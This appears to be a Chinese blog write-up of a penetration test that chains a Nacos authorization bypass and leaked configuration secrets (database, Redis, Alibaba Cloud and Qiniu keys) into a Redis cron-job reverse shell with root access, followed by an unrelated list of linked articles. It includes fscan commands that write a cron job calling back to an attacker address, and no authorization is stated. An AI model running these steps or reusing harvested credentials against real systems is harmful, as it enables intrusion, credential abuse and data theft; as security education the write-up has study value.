记录一次从nacos配置信息泄露到redis写计划任务接管主机

经典c段打点开局。使用dddd做快速的打点发现某系统存在nacos权限绕过

有点怀疑是蜜罐,毕竟nacos这实在是有点经典

nacos利用

老规矩见面先上nacos利用工具打一波看看什么情况

弱口令nacos以及未授权访问,看这记录估计被光顾挺多次了啊

手动利用Nacos-Client Yaml 反序列化漏洞失败了,只能摸一摸nacos系统里面有没有什么信息

nacos的打法一般就是看有没有配置信息泄露和自身的一些反序列化漏洞

我这里上面一行有4个都可以去点开看看里面的列的内容,然后配置信息一般就是点开详情就可以查看

运气非常好

找到了数据库的链接账号和密码

redis的密码

微信和wb的一些配置信息?微信小程序的我倒是遇到过,wb的还是第一次见,在网上也没有找打利用方式

惊喜有阿里云的ak和sk!!!

基本就是这些,收获有点过多了

阿里云aksk利用

先尝试利用一下ak和sk,使用阿里云tools

查询后什么都没有查到,估计是失效了,我就说哪有这么好的情况,用ossbrowser尝试后也是没有意外的失效了。

mysql数据库利用

转头查看一下账号密码看能不能连接一下数据库

重新对服务器进行一下扫描

数据库竟然全部开启了对外连接

优先使用mysql连接一下

使用工具MTDU

尝试进行利用

发现错误提示无法写入文件

那么直接用navicat连接一下,数据库的信息还是挺多的,然后检测了一下发现没有目录的写入权限,后续像看看系统能不能写日志文件包含,然后修改日志的保存地址也是失败了。只能在数据库中翻一番有没有什么信息或者密码啥的

功夫不负有心人竟然在数据库中翻到了7牛云的ak和sk,然后就真没翻到其他的东西了,另外没有看到什么没加密的密码以及加了密也没有破解出来的密码和三要素的信息。。。

7牛云aksk利用

我也是第一次遇到7牛云的aksk泄露,在网上找了一下看看利用方式

有一个工具利用

https://github.com/12qwertyuiop/qvmtool

使用方式也很简单,先-s设置一下aksk然后-l就可以了

结果利用失败了,看报错应该是没有返回信息,也就是没利用成功

有点难受,我觉得是工具的原因,于是去官网又找到了另一个连接工具kodo

图形化工具 Kodo Browser_实用工具_对象存储 - 七牛开发者中心

结果也是失败了,看来也是失效了。。。

3306打完了还剩下一个redis也是利用的这个账号密码

redis利用

MDTU虽然也有redis模块但是我觉得他那个模块有点问题,我使用的时候使用失败了,于是直接用fscan的尝试利用算了

参数

-rf写公钥,-rs写计划任务

先扫一下看能不能写redis,毕竟以root权限来启动redis的还是很少的

./fscan_linux -h ip地址 -p 6379 -pwd 密码

出来了,可以写定时任务和公钥,看来是root权限启动的而且是centos的系统,因为只有centos的系统才可以写计划任务

redis手动利用我之前也写过相关的文章

护网HW面试——redis利用方式即复现_redis复现-CSDN博客

我这里直接写计划任务反弹shell上线了

./fscan_linux -h ip地址 -p 6379 -pwd 密码 -rs 攻击机地址:监听端口

等待一会计划任务的执行直接反弹上线,而且直接就是root权限

舒服了,后续也是直接上线vshell然后打隧道建代理打内网,用vshell打隧道简直不要太舒服,一键直接打好,感觉和nps一样而且比nps方便,不需要还自己把客户端上传去执行

后记:

         经典的nacos的利用方式,运气好遇到个root权限起的redis服务,还是挺有意思的,毕竟之前只在公众号文章中看到这些打法,实际遇到了还是花了挺多时间的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/455070.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL - Navicat自动备份MySQL数据

对于从事IT开发的工程师,数据备份我想大家并不陌生,这件工程太重要了!对于比较重要的数据,我们希望能定期备份,每天备份1次或多次,或者是每周备份1次或多次。 如果大家在平时使用Navicat操作数据库&#x…

深入解析Python数据容器

Python数据容器 1,数据容器介绍2,数据容器的分类3,数据容器:list(列表)3.1,列表的定义3.2,列表的下标索引3.3,列表的常用操作3.3.1,查找指定元素下标3.3.2&am…

【OpenAI】第三节(上下文)什么是上下文?全面解读GPT中的上下文概念与实际案例

文章目录 一、GPT上下文的定义1.1 上下文的组成 二、GPT上下文的重要性2.1 提高生成文本的相关性2.2 增强对话的连贯性2.3 支持多轮对话 三、使用上下文改善编程对话3.1 使用上下文的概念3.2 使用上下文改善对话的作用3.3 使用上下文改善对话的方法3.4 案例分析 四、利用历史记…

安装Openeuler出现的问题

1.正常安装中,不显示已有的网络,ens33 尝试:手敲ens33配置,包括使用uuidgen ens33 配置还是不行 可能解决办法1:更换安装的版本。譬如说安装cenos 7 64位 启动虚拟机,更换版本之后的安装界面,…

Excel常用操作培训

以下是Excel的基本操作,内部培训专用。喜欢就点赞收藏哦! 目录 1 Excel基本操作 1.1 常用快捷键 1.1.1快捷键操作工作簿、工作表 1.1.2快捷键操作 1.1.3单元格操作 1.1.4输入操作 2.1 常见功能描述 2.1.1 窗口功能栏 2.1.2 剪切板 2.1.3 字体…

计算机网络——传输层服务

传输层会给段加上目标ip和目标端口号 应用层去识别报文的开始和结束

海南聚广众达电子商务咨询有限公司靠谱吗怎么样?

在当今这个数字化浪潮席卷全球的时代,抖音电商以其独特的魅力成为了众多商家争相入驻的新蓝海。而在这片浩瀚的电商海洋中,如何找到一家既专业又可靠的合作伙伴,成为了众多商家心中的一大难题。今天,我们就来深入剖析一下海南聚广…

组件可控个性化生成新方法MagicTailor:生成过程中可以自由地定制ID

今天的文章来自公众号粉丝投稿,文章提出了一种组件可控的个性化生成方法MagicTailor,旨在个性化生成过程中可以自由地定制ID的特定组件。 相关链接 论文阅读:https://arxiv.org/pdf/2410.13370 项目主页:https://correr-zhou.gi…

拼多多详情API接口的获取与应用

一、拼多多详情API接口概述 1. API接口定义与功能 拼多多开放平台为开发者提供了丰富的API接口,其中商品详情API接口尤为重要。该接口允许开发者通过编程方式获取商品的详细信息,包括商品标题、价格、描述、图片、规格参数、库存等。这些信息对于电商数…

无人机之自主飞行关键技术篇

无人机自主飞行指的是无人机利用先进的算法和传感器,实现自我导航、路径规划、环境感知和自动避障等能力。这种飞行模式大大提升了无人机的智能化水平和操作的自动化程度。 一、传感器技术 传感器是无人机实现自主飞行和数据采集的关键组件,主要包括&a…

Unity3D学习FPS游戏(1)获取素材、快速了解三维模型素材(骨骼、网格、动画、Avatar、材质贴图)

前言:最近重拾Unity,准备做个3D的FPS小游戏,这里以官方FPS案例素材作为切入。 导入素材和素材理解 安装Unity新建项目新建文件夹和Scene如何去理解三维模型素材找到模型素材素材预制体结构骨骼和网格材质(Material)、…

No.18 笔记 | XXE(XML 外部实体注入)漏洞原理、分类、利用及防御整理

一、XXE 漏洞概述 (一)定义 XXE(XML 外部实体注入)漏洞源于 XML 解析器对外部实体的不当处理,攻击者借此注入恶意 XML 实体,可实现敏感文件读取、远程命令执行和内网渗透等危险操作。 (二&am…

一、Python基础语法(有C语言基础速成版)

在python中,变量是没有类型的,变量存储的数据是有类型的 可以把变量当做一个存放物品的盒子 一、字面量 字面量:在代码中,被写下来的 固定的值 python中常见的值的类型 二、注释 # 我是单行注释,一般要加个空格&a…

java设计模式——装饰者模式

定义: 装饰者模式是一种结构型设计模式,它允许动态地给对象添加新的功能,而不会改变其原有的结构。与继承不同,装饰者模式通过组合而不是继承来扩展对象的功能,这样可以有效地避免类爆炸问题(多个子类的冗余…

动手学深度学习9.7. 序列到序列学习(seq2seq)-笔记练习(PyTorch)

本节课程地址:62 序列到序列学习(seq2seq)【动手学深度学习v2】_哔哩哔哩_bilibili 本节教材地址:9.7. 序列到序列学习(seq2seq) — 动手学深度学习 2.0.0 documentation 本节开源代码:...>…

pdf编辑软件有哪些?方便好用的pdf编辑软件分享

PDF文件因其跨平台、格式固定的特性,成为了工作、学习和生活中不可或缺的一部分。然而,随着需求的不断增加,仅仅阅读PDF文件已难以满足我们的需求,编辑、转换PDF文件成为了新的焦点,下面给大家分享几款方便好用的PDF编…

《Linux从小白到高手》综合应用篇:深入理解Linux常用关键内核参数及其调优

1. 题记 有关Linux关键内核参数的调整,我前面的调优文章其实就有涉及到,只是比较零散,本篇集中深入介绍Linux常用关键内核参数及其调优,Linux调优80%以上都涉及到内核的这些参数的调整。 2. 文件系统相关参数 fs.file-max 参数…

SpringBoot3 + MyBatisPlus 快速整合

一、前言 MyBatis 最佳搭档,只做增强不做改变,为简化开发、提高效率而生。 这个发展到目前阶段已经很成熟了,社区也比较活跃,可以放心使用。官网地址:https://baomidou.com 二、快速开始 引入依赖 这里我引入了核心…

stm32单片机个人学习笔记11(ADC模数转换器)

前言 本篇文章属于stm32单片机(以下简称单片机)的学习笔记,来源于B站教学视频。下面是这位up主的视频链接。本文为个人学习笔记,只能做参考,细节方面建议观看视频,肯定受益匪浅。 STM32入门教程-2023版 细…

Linux系列-Linux的常见指令(三)

🌈个人主页:羽晨同学 💫个人格言:“成为自己未来的主人~” mv 1.剪切文件,目录 2.重命名 首先,我们先来看第一个作用 假如说,我们原先存在一个hello.txt,我们如果想要将这个文件移动到其他的…